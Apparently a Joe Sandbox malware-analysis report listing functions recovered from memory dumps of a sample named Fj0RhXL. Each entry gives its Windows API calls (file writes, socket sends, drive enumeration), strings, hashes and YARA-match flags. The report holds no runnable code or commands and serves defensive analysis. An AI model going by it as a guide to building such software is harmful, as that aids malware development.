Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_$std::exception::exception$Exception@8Throw
String ID: invalid string position$string too long
API String ID: 1387324424-4289949731
Opcode ID: 2ccc91e40cca5f2a8bad3ab61217cda407bc229d8f0eb4dab6b79014587962b0
Instruction ID: 046707f5d47dfc472b0fb51e55b2c492f99a59b6bd025393d297777df5c47c28
Opcode Fuzzy Hash: 2ccc91e40cca5f2a8bad3ab61217cda407bc229d8f0eb4dab6b79014587962b0
Instruction Fuzzy Hash: 0C51E731B102049BD729EF6CD8A097EF7EAEF85614B28491EE4D28B741D771EC408794

Function 6C372FEC Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

Part of subcall function 6C371AD3: SetTextColor.GDI32(00000000), ref: 6C371B19

_sprintf.LIBCMT ref: 6C3730BC
_sprintf.LIBCMT ref: 6C373121
_sprintf.LIBCMT ref: 6C373144
_sprintf.LIBCMT ref: 6C37316F

Strings

This person, xrefs: 6C373090, 6C373095
their %s., xrefs: 6C37313E
%s., xrefs: 6C373169
%s %s %s: %s's, xrefs: 6C3730B6

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$ColorText
String ID: %s %s %s: %s's$%s.$This person$their %s.
API String ID: 777165778-500940785
Opcode ID: 7da19962ee0f59d15688f9e7959ed26dba64b55a614c7461e126d8bbfda97a46
Instruction ID: 346c878266617ee11002eb58e3b39d92d9bc9ac25486e497cd824a7ed647ce0b
Opcode Fuzzy Hash: 7da19962ee0f59d15688f9e7959ed26dba64b55a614c7461e126d8bbfda97a46
Instruction Fuzzy Hash: 194127B2E01014AFDB21EF28CC81FE8B7B6AB16308F044595D1C497650CBBDED948FA5

Function 03D96F40 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D96F7E
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 03D96F9C
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 03D96FD9
CloseHandle.KERNEL32(00000000), ref: 03D96FE4
lstrlenW.KERNEL32(?), ref: 03D96FF1
wsprintfW.USER32 ref: 03D97015

Strings

%s %s, xrefs: 03D9700F

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
String ID: %s %s
API String ID: 1326869720-2939940506
Opcode ID: e5795a1038eaf81e8d298a2b4e38de5c29865a53dcb419d0da16a537e6fb2a7f
Instruction ID: 230a389aa9ffdddc520c5d04e490d513e7b6414a818a5e4ddb529ef57b5dd773
Opcode Fuzzy Hash: e5795a1038eaf81e8d298a2b4e38de5c29865a53dcb419d0da16a537e6fb2a7f
Instruction Fuzzy Hash: 72318673610218EBEF24DF64DC84FEB7378EB44711F44069AF649A61C0EA749A54CFA1

Function 03D89659 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,A:\), ref: 03D89666
lstrcmpiW.KERNEL32(?,B:\), ref: 03D89676
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 03D896A6
lstrlenW.KERNEL32(?), ref: 03D896B7
__wcsnicmp.LIBCMT ref: 03D896CE
lstrcpyW.KERNEL32(00000AD4,?), ref: 03D89704
lstrcpyW.KERNEL32(?,?), ref: 03D89728
lstrcatW.KERNEL32(?,00000000), ref: 03D89733

Strings

B:\, xrefs: 03D89670
A:\, xrefs: 03D89660

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
String ID: A:\$B:\
API String ID: 4249875308-1009255891
Opcode ID: 7ac5a0dadc758f8a48d1e48f0bc158329e0058d4a4acd6f12d19adaec2b2b820
Instruction ID: 75c1d2d5def91b267a09a21a2f1b92354ade4f139f40b92e5842c037800fb974
Opcode Fuzzy Hash: 7ac5a0dadc758f8a48d1e48f0bc158329e0058d4a4acd6f12d19adaec2b2b820
Instruction Fuzzy Hash: 4F114F72A01218DBDB20EFA1DC44BEEB378EF45700F044599DA1AA7240E770EA05CBA5

Function 03D943F0 Relevance: 13.7, APIs: 9, Instructions: 195timeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,90594F2A,00000000,74DF2EE0,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9,00000000), ref: 03D94433
InitializeCriticalSectionAndSpinCount.KERNEL32(03D98D59,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D944D2
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94510
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94535
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D9455A

Part of subcall function 03D81280: __CxxThrowException@8.LIBCMT ref: 03D81290

Part of subcall function 03D97AD0: InitializeCriticalSectionAndSpinCount.KERNEL32(03D98C21,00000000,90594F2A,03D98BF9,74DF2F60,00000000,?,03D98DD1,03DB0B1B,000000FF,?,03D9460A,03D98DD1,?,?,00000000), ref: 03D97B27
Part of subcall function 03D97AD0: InitializeCriticalSectionAndSpinCount.KERNEL32(03D98C39,00000000,?,03D98DD1,03DB0B1B,000000FF,?,03D9460A,03D98DD1,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D97B43

InterlockedExchange.KERNEL32(03D98C11,00000000), ref: 03D94660
timeGetTime.WINMM(?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94666
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D94674
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03DB0C7B,000000FF,?,03D98BF9), ref: 03D9467D

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CreateEvent$CountCriticalInitializeSectionSpin$Exception@8ExchangeInterlockedThrowTimetime
String ID:
API String ID: 997586827-0
Opcode ID: 6d12443dc5d2d725db4770898321ce23d198180a752b5240d2b4a1a15b689ebc
Instruction ID: b0d9017d75555bf861823876c342041c512800e23a5edd959922d437707756db
Opcode Fuzzy Hash: 6d12443dc5d2d725db4770898321ce23d198180a752b5240d2b4a1a15b689ebc
Instruction Fuzzy Hash: A381D7B1A01A46FFE744DF7AC88479AFBA8FB09344F50422EE12D87640D775A964CF90

Function 03D834D0 Relevance: 13.6, APIs: 9, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 03D83630: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03D83637
Part of subcall function 03D83630: _free.LIBCMT ref: 03D8366C
Part of subcall function 03D83630: _malloc.LIBCMT ref: 03D836A7
Part of subcall function 03D83630: _memset.LIBCMT ref: 03D836B5

InterlockedIncrement.KERNEL32(03DC433C), ref: 03D83535
InterlockedIncrement.KERNEL32(03DC433C), ref: 03D83543
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 03D8356A
setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 03D83583
ResetEvent.KERNEL32(?,?,?,03DC433C), ref: 03D835BE
SetLastError.KERNEL32(00000000), ref: 03D835F1
GetLastError.KERNEL32 ref: 03D83609

Part of subcall function 03D83F30: GetCurrentThreadId.KERNEL32 ref: 03D83F35
Part of subcall function 03D83F30: send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D83F97
Part of subcall function 03D83F30: SetEvent.KERNEL32(?), ref: 03D83FBA
Part of subcall function 03D83F30: InterlockedExchange.KERNEL32(?,00000000), ref: 03D83FC6
Part of subcall function 03D83F30: WSACloseEvent.WS2_32(?), ref: 03D83FD4
Part of subcall function 03D83F30: shutdown.WS2_32(?,00000001), ref: 03D83FEC
Part of subcall function 03D83F30: closesocket.WS2_32(?), ref: 03D83FF6

SetLastError.KERNEL32(00000000), ref: 03D83619

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
String ID:
API String ID: 127459856-0
Opcode ID: 43c7caa43468428c89a53189e96d11055d849b823662727e7b51b8721e085545
Instruction ID: 2c42a98061baaa4226f3d6020304af4496622e606ae5eb53c4cdc259e0884546
Opcode Fuzzy Hash: 43c7caa43468428c89a53189e96d11055d849b823662727e7b51b8721e085545
Instruction Fuzzy Hash: C34160BA640704AFD360EF69DC81B5AB7E8FB48B11F50082EE68AD7780D7B1F5448B50

Function 02F034F0 Relevance: 13.6, APIs: 9, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 02F03650: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02F03657
Part of subcall function 02F03650: _free.LIBCMT ref: 02F0368C
Part of subcall function 02F03650: _malloc.LIBCMT ref: 02F036C7
Part of subcall function 02F03650: _memset.LIBCMT ref: 02F036D5

InterlockedIncrement.KERNEL32(02F1D990), ref: 02F03555
InterlockedIncrement.KERNEL32(02F1D990), ref: 02F03563
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02F0358A
setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02F035A3
ResetEvent.KERNEL32(?,?,?,02F1D990), ref: 02F035DE
SetLastError.KERNEL32(00000000), ref: 02F03611
GetLastError.KERNEL32 ref: 02F03629

Part of subcall function 02F03F50: GetCurrentThreadId.KERNEL32 ref: 02F03F55
Part of subcall function 02F03F50: send.WS2_32(?,02F17420,00000010,00000000), ref: 02F03FB6
Part of subcall function 02F03F50: SetEvent.KERNEL32(?), ref: 02F03FD9
Part of subcall function 02F03F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02F03FE5
Part of subcall function 02F03F50: WSACloseEvent.WS2_32(?), ref: 02F03FF3
Part of subcall function 02F03F50: shutdown.WS2_32(?,00000001), ref: 02F0400B
Part of subcall function 02F03F50: closesocket.WS2_32(?), ref: 02F04015

SetLastError.KERNEL32(00000000), ref: 02F03639

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
String ID:
API String ID: 127459856-0
Opcode ID: 30b3709b19c5e156ad92909337dab1352c3a0bbd307cedfce7cf6622ca7903f1
Instruction ID: 730e3dcf6e29e346ee7df419059701740c3e4f54ab11de32002954684348e516
Opcode Fuzzy Hash: 30b3709b19c5e156ad92909337dab1352c3a0bbd307cedfce7cf6622ca7903f1
Instruction Fuzzy Hash: EF417CB1A40704AFE360EF69DCC0B6AF7E5BB48751F91086EE64AD7680D7B1E8048F50

Function 03D84460 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 03D84473
ResetEvent.KERNEL32(?), ref: 03D8447C
timeGetTime.WINMM ref: 03D8447E
InterlockedExchange.KERNEL32(?,00000000), ref: 03D8448D
WaitForSingleObject.KERNEL32(?,00001770), ref: 03D844DB
ResetEvent.KERNEL32(?), ref: 03D844F8

Part of subcall function 03D83F30: GetCurrentThreadId.KERNEL32 ref: 03D83F35
Part of subcall function 03D83F30: send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D83F97
Part of subcall function 03D83F30: SetEvent.KERNEL32(?), ref: 03D83FBA
Part of subcall function 03D83F30: InterlockedExchange.KERNEL32(?,00000000), ref: 03D83FC6
Part of subcall function 03D83F30: WSACloseEvent.WS2_32(?), ref: 03D83FD4
Part of subcall function 03D83F30: shutdown.WS2_32(?,00000001), ref: 03D83FEC
Part of subcall function 03D83F30: closesocket.WS2_32(?), ref: 03D83FF6

ResetEvent.KERNEL32(?), ref: 03D8450C

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
String ID:
API String ID: 542259498-0
Opcode ID: 65ea6550bb1547bd5909b4e3a840df6eecb4d4ecd103d5e39c827bbf709dd9bd
Instruction ID: f23ce76511145f0edb0085d8537a54d16c08c4527d71d38d93777445052809c8
Opcode Fuzzy Hash: 65ea6550bb1547bd5909b4e3a840df6eecb4d4ecd103d5e39c827bbf709dd9bd
Instruction Fuzzy Hash: 85216176600704ABC720FF79DC84B9BB3E8EF88B10F100A5EE59AC7640D671F5448BA1

Function 02F04420 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 02F04433
ResetEvent.KERNEL32(?), ref: 02F0443C
timeGetTime.WINMM ref: 02F0443E
InterlockedExchange.KERNEL32(?,00000000), ref: 02F0444D
WaitForSingleObject.KERNEL32(?,00001770), ref: 02F0449B
ResetEvent.KERNEL32(?), ref: 02F044B8

Part of subcall function 02F03F50: GetCurrentThreadId.KERNEL32 ref: 02F03F55
Part of subcall function 02F03F50: send.WS2_32(?,02F17420,00000010,00000000), ref: 02F03FB6
Part of subcall function 02F03F50: SetEvent.KERNEL32(?), ref: 02F03FD9
Part of subcall function 02F03F50: InterlockedExchange.KERNEL32(?,00000000), ref: 02F03FE5
Part of subcall function 02F03F50: WSACloseEvent.WS2_32(?), ref: 02F03FF3
Part of subcall function 02F03F50: shutdown.WS2_32(?,00000001), ref: 02F0400B
Part of subcall function 02F03F50: closesocket.WS2_32(?), ref: 02F04015

ResetEvent.KERNEL32(?), ref: 02F044CC

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
String ID:
API String ID: 542259498-0
Opcode ID: 781b24087a41024779eaa12566ecd48412ff1c8d46ae509e961ec3488090f1b1
Instruction ID: ed72a67de6799f290621b6b53e5303d73d24c82e91ba203cc9ff2db12bb9291e
Opcode Fuzzy Hash: 781b24087a41024779eaa12566ecd48412ff1c8d46ae509e961ec3488090f1b1
Instruction Fuzzy Hash: 052193766407046BD630EF79DD84B9BF3E8EF89751F500A0EF68AC7280D671B4009BA0

Function 03D84E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,?), ref: 03D84E79
TryEnterCriticalSection.KERNEL32(?,?), ref: 03D84E98
TryEnterCriticalSection.KERNEL32(?), ref: 03D84EA2
SetLastError.KERNEL32(0000139F), ref: 03D84EB9
LeaveCriticalSection.KERNEL32(?), ref: 03D84EC2
LeaveCriticalSection.KERNEL32(?), ref: 03D84EC9

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 6cfe7f9333a8fb9ab74f18b0398b3826dcebc677cf064c439e98832aaa7f1576
Instruction ID: 3b47cdfbe4da5f15dd61aac3101257b61e1c602b0591fbabf110ebc5b544ed4a
Opcode Fuzzy Hash: 6cfe7f9333a8fb9ab74f18b0398b3826dcebc677cf064c439e98832aaa7f1576
Instruction Fuzzy Hash: 74116333600305CBC320FB7AEC8596BF3E8EF48711B040A6EE655C2650EA71E844C6A5

Function 02F04E50 Relevance: 13.6, APIs: 9, Instructions: 70COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,?), ref: 02F04E69
TryEnterCriticalSection.KERNEL32(?,?), ref: 02F04E88
TryEnterCriticalSection.KERNEL32(?), ref: 02F04E92
SetLastError.KERNEL32(0000139F), ref: 02F04EA9
LeaveCriticalSection.KERNEL32(?), ref: 02F04EB2
LeaveCriticalSection.KERNEL32(?), ref: 02F04EB9

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeave
String ID:
API String ID: 4082018349-0
Opcode ID: 3918de8c664c24e23117635842f05635b0a44f86dbee421fb0713396bf0b2882
Instruction ID: 785b6b9643c1a1a01db76f7aa94368de9231161121795588b317f182c5db2bc3
Opcode Fuzzy Hash: 3918de8c664c24e23117635842f05635b0a44f86dbee421fb0713396bf0b2882
Instruction Fuzzy Hash: 85116332B003058BD320EBB9ED84A6BF7E8EB88755B810A2AE705C6580D771D815DAA5

Function 6C3CEF52 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 307COMMON

Download Yara Rule

APIs

_fprintf.LIBCMT ref: 6C3CF0C8
_sprintf.LIBCMT ref: 6C3CF298
_sprintf.LIBCMT ref: 6C3CF2DD

Part of subcall function 6C3C91A8: _sprintf.LIBCMT ref: 6C3C91D8

Strings

%.3s, xrefs: 6C3CF292
Aln, xrefs: 6C3CF2BB
M31, xrefs: 6C3CF2D4
%d %d(%c)center, xrefs: 6C3CF0BD

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$_fprintf
String ID: %.3s$%d %d(%c)center$Aln$M31
API String ID: 3156639200-3137262557
Opcode ID: ab2f0d2ff2820982ece6c8e2c7787755c2c86818e7491c2f2ae2f91a5e48a02c
Instruction ID: c0b0048b0c6ffecbdfa055ba71cf765086de516176996dce6d235e107e49d1f1
Opcode Fuzzy Hash: ab2f0d2ff2820982ece6c8e2c7787755c2c86818e7491c2f2ae2f91a5e48a02c
Instruction Fuzzy Hash: 4BA1EF7A744224ABDB10EF68C881B9D3BB6E74B72CF244507E504C6A90D772DC868F93

Function 03D82190 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 303COMMON

Download Yara Rule

APIs

Part of subcall function 03D81620: __vswprintf.LIBCMT ref: 03D81656

_malloc.LIBCMT ref: 03D82380

Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83

_memmove.LIBCMT ref: 03D823C6

Strings

input probe, xrefs: 03D823F1
input psh: sn=%lu ts=%lu, xrefs: 03D8232F
input wins: %lu, xrefs: 03D8241F
input ack: sn=%lu rtt=%ld rto=%ld, xrefs: 03D822FC
[RI] %d bytes, xrefs: 03D821BF

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: AllocateHeap__vswprintf_malloc_memmove
String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
API String ID: 1438150933-868042568
Opcode ID: aeb09069d2fa85b61033532c46c5b7aaf0df31ee13c1c03909695b0155789dac
Instruction ID: 5a4bb944ef625676ce8e9d68e2866f73636d6e71dbde7f3a86d3d2b242f13b23
Opcode Fuzzy Hash: aeb09069d2fa85b61033532c46c5b7aaf0df31ee13c1c03909695b0155789dac
Instruction Fuzzy Hash: C2B1A475A002098FCB18EF6DD8906AEBBB5FF44710F0849AEDD499B346D731E945CBA0

Function 6C3CDCFF Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 271COMMON

Download Yara Rule

APIs

MoveToEx.GDI32(00000003,?,00000000,?), ref: 6C3CDD56
LineTo.GDI32(00000000,?), ref: 6C3CDD68
SetPixel.GDI32(00000000,?,?,6C3CF814), ref: 6C3CDD86
_fprintf.LIBCMT ref: 6C3CDDE6
_fprintf.LIBCMT ref: 6C3CDE05

Strings

%d %d t, xrefs: 6C3CDDDB
%d %d %d %d l, xrefs: 6C3CDDFA

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _fprintf$LineMovePixel
String ID: %d %d %d %d l$%d %d t
API String ID: 4254231064-3651011223
Opcode ID: 1520da9912e777c97106956461753988d58b9190b9a69d26313dc561e9a69ffd
Instruction ID: 5fe1cef1913a88730d22b657fc46489a0c2303ccc7b09ffe2f0410e8852cfee8
Opcode Fuzzy Hash: 1520da9912e777c97106956461753988d58b9190b9a69d26313dc561e9a69ffd
Instruction Fuzzy Hash: A4A18B71F8021ADBDF00EF69C88559E7BB5FB46328F24822AF914E6A40D7319D518FD2

Function 03D98890 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 03D988B2
SetLastError.KERNEL32(0000007F), ref: 03D989B5

Strings

Main, xrefs: 03D9889F, 03D988DC

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: Main
API String ID: 1452528299-521822810
Opcode ID: 8faab458f99f83600b06c5fc1a25670ed00276d492c9b580beb2d7b9aa3ccdfe
Instruction ID: 47f969ee2f2d5d668689d4d2999f388776f09b90f6a5baa82ce342a95f70ad2b
Opcode Fuzzy Hash: 8faab458f99f83600b06c5fc1a25670ed00276d492c9b580beb2d7b9aa3ccdfe
Instruction Fuzzy Hash: D841D372A40205EFEB20DF58D881BAAB3E8FF45B14F0446AAD845DB351E771E841CB91

Function 6C3DFD54 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C3DFD87
___crtGetStringTypeA.LIBCMT ref: 6C3DFE51
